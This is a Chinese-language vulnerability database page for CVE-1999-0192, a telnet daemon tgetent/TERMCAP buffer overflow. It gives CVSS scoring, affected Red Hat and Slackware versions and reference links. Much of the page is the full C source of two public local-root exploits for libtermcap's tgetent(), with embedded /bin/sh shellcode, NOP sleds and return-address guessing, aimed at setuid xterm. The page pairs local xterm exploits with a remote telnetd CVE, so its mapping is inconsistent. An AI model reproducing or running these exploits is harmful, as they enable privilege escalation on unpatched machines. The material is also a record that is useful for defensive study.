CVE-1999-0192
CVSS10.0
发布时间 :1997-10-18 00:00:00
修订时间 :2008-09-09 08:33:59
NMCOE    

[原文]Buffer overflow in telnet daemon tgetent routing allows remote attackers to gain root access via the TERMCAP environmental variable.


[CNNVD]Telnet daemon tgetent routing权限许可和访问控制漏洞(CNNVD-199710-016)

        Telnet daemon tgetent routing存在缓冲区溢出漏洞。远程攻击者可以借助TERMCAP环境变量获得根访问权限。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:slackware:slackware_linux:3.2
cpe:/o:slackware:slackware_linux:3.5
cpe:/o:redhat:linux:6.0::i386
cpe:/o:slackware:slackware_linux:3.3
cpe:/o:redhat:linux:4.2Red Hat Linux 4.2
cpe:/o:redhat:linux:5.1Red Hat Linux 5.1
cpe:/o:redhat:linux:4.1Red Hat Linux 4.1
cpe:/o:slackware:slackware_linux:3.6
cpe:/o:redhat:linux:5.2::i386
cpe:/o:redhat:linux:4.0Red Hat Linux 4.0
cpe:/o:slackware:slackware_linux:3.4
cpe:/o:slackware:slackware_linux:4.0
cpe:/o:redhat:linux:5.0Red Hat Linux 5.0
cpe:/o:slackware:slackware_linux:3.9

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0192
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0192
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199710-016
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

Telnet daemon tgetent routing权限许可和访问控制漏洞
危急 缓冲区溢出
1997-10-18 00:00:00 2005-05-02 00:00:00
远程  
        Telnet daemon tgetent routing存在缓冲区溢出漏洞。远程攻击者可以借助TERMCAP环境变量获得根访问权限。

- 公告与补丁

        

- 漏洞信息 (19464)

RedHat Linux <= 6.0, Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (1) (EDBID:19464)
linux local
1999-08-18 Verified
0 m0f0
N/A [点击下载]
source: http://www.securityfocus.com/bid/588/info

A buffer overflow existed in libtermcap's tgetent() function, which could cause the user to execute arbitrary code if they were able to supply their own termcap file. Versions of libtermcap 2.0.8 and earliear are vulnerable.

Under Red Hat Linux 5.2 and 4.2, this could lead to local users gaining root privileges, as xterm (as well as other possibly setuid programs) are linked against libtermcap. Under Red Hat Linux 6.0, xterm is not setuid root.

Debian and Caldera OpenLinux use the ncurses library instead of termcap and thus are not vulnerable.

/*
   ****************************************************
   ***          libtermcap xterm exploit            ***
   ***                by m0f0 1999                  ***
   ***                                              ***
   ***          it works for xterm/nxterm           ***
   ***          Tested Slackware 3.5, 3.6           ***
   ****************************************************
*/

#include <stdio.h>
#define BUF_SIZE 5000
#define POS_RET  2000
#define POS_SEP  3000
#define RETADDR  0xbfffefef
#define EGG      "/tmp/egg_termcap"

// shellcode
char shellcode[] = // 48 caracteres
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff/bin/sh";

void main (int argc, char *argv[]) {
  int i;
  FILE *f;
  char buf[BUF_SIZE];
  long retaddr, offset;
	
  printf ("\n");
  printf ("****************************************** \n");
  printf ("* libtermcap xterm exploit, by m0f0 1999 * \n");
  printf ("****************************************** \n\n");
  printf ("Use : %s [offset] \n", argv[0]);

  offset = 0;
  if (argc>1) {
    offset = atol (argv[1]);
  }

  retaddr = RETADDR + offset;
  printf ("Return Address = 0x%x \n",retaddr);
	

  // Fill buffer with NOP's
  memset (buf, 0x90, BUF_SIZE);
  buf[BUF_SIZE]=0;
	
  // Set termcap file header and sep
  memcpy (buf, "xterm|", 6);
  memcpy (buf+POS_SEP,":\\",2);

  // Return Address
  for (i=POS_RET; i<=POS_SEP-10; i+=4) {
    *(long*)(buf+i) = (long) retaddr;
  }

  // Copy shellCode
  for (i=0; i<strlen(shellcode); i++) {
    buf[i+2000] = shellcode[i];
  }

  // Write EGG_TERMCAP
  f = fopen (EGG,"w");
  fprintf (f,"%s",buf);
  fclose (f);
	
  // Export TERMCAP
  setenv ("TERMCAP", EGG, 1);

  // Run program
  execl ("/usr/X11R6/bin/xterm","xterm",NULL);

}


		

- 漏洞信息 (19465)

RedHat Linux <= 6.0, Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (2) (EDBID:19465)
linux local
1999-08-18 Verified
0 sk8
N/A [点击下载]
source: http://www.securityfocus.com/bid/588/info
 
A buffer overflow existed in libtermcap's tgetent() function, which could cause the user to execute arbitrary code if they were able to supply their own termcap file. Versions of libtermcap 2.0.8 and earliear are vulnerable.
 
Under Red Hat Linux 5.2 and 4.2, this could lead to local users gaining root privileges, as xterm (as well as other possibly setuid programs) are linked against libtermcap. Under Red Hat Linux 6.0, xterm is not setuid root.
 
Debian and Caldera OpenLinux use the ncurses library instead of termcap and thus are not vulnerable.

/* Local exploit for suid root programs linked to libtermcap < 2.0.8-15 
 *
 * tested with xterm and nxterm on RedHat 5.2 and 4.2
 *
 * sk8@lucid-solutions.com
 * http://www.lucid-solutions.com
 *
 * Usage:
 * ./smashcap  		-default is buffer size of 4210 and offset of 300
 *			 and seems to work on RH 5.2
 *
 * Adjust offsets (somewhere between 230 - 1140) if necessary
 *
 * ./smashcap <offset> 	-buffer size defaults to 4210
 * ./smashcap <offset> <buffersize>
 *
 *
 * In order to stop script kids/opportunists, one MINOR change must be
 * made in order for this to work.  
 *
 * Use only to test your machines to show you that you must patch libtermcap.
 * Quick fix, chmod u-s ALL suid root programs linked with libtermcap.
 *
 *						- sk8 of LS
 *
 */

#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define filename "/tmp/lstermcap"
#define entry1   "xterm|"
#define DEFAULT_BUFSIZE 4210

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh"; /* Linux shellcode */

long get_sp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(int argc, char *argv[]) {
   int bufsize, offset, i, fd;
   long *bufptr;
   char *ptr, *buffer, *tempbuf;

   setenv("TERMCAP", "/tmp/lstermcap", 1);


   bufsize=DEFAULT_BUFSIZE;

   if (argc > 2) bufsize=atoi(argv[2]);
   if (argc > 1) offset=atoi(argv[1]);
   else offset=300;
  

   printf("bufsize: %i\noffset: %i\n", bufsize,offset);

   if(!(buffer = malloc(bufsize))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }
  if(!(tempbuf = malloc(bufsize+strlen(entry1) ))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }

   printf("get_sp(): 0x%x\n", get_sp());
   printf("get_sp()-offs: 0x%x\n", (get_sp()-offset) );

   ptr=buffer;
   bufptr = (long *)(buffer+2); /* align */

   for (i = 0; i < bufsize; i += 4)
      	*(bufptr++) = (get_sp()-offset);

   	for (i = 0; i < (bufsize/2); i++) 
     		 buffer[i] = 0x90;

	ptr=buffer + ((bufsize/2) - strlen(shellcode)/2);
  	for (i = 0; i < strlen(shellcode); i++)
      		*(ptr++) = shellcode[i]; //shellcode


  	ptr=ptr+24;

	/* now insert the characters : and \ into the termcap - these are vital */
  	*(ptr++)=0x3a;  
  	*(ptr++)=0x5c;  


   	snprintf(tempbuf, (bufsize+strlen(entry1)), "%s%s%s", entry1, buffer);
   	fd = open(filename, O_WRONLY|O_CREAT|O_TRUNC, 0666);
   	write (fd, tempbuf, strlen(tempbuf));
   	close(fd);
	printf("made termcap\n");

	execl("/usr/X11R6/bin/xterm","xterm", 0);
	
}

		

- 漏洞信息

1047
Multiple BSD Termcap tgetent() Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public

- 漏洞描述

- 时间线

1997-10-21 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站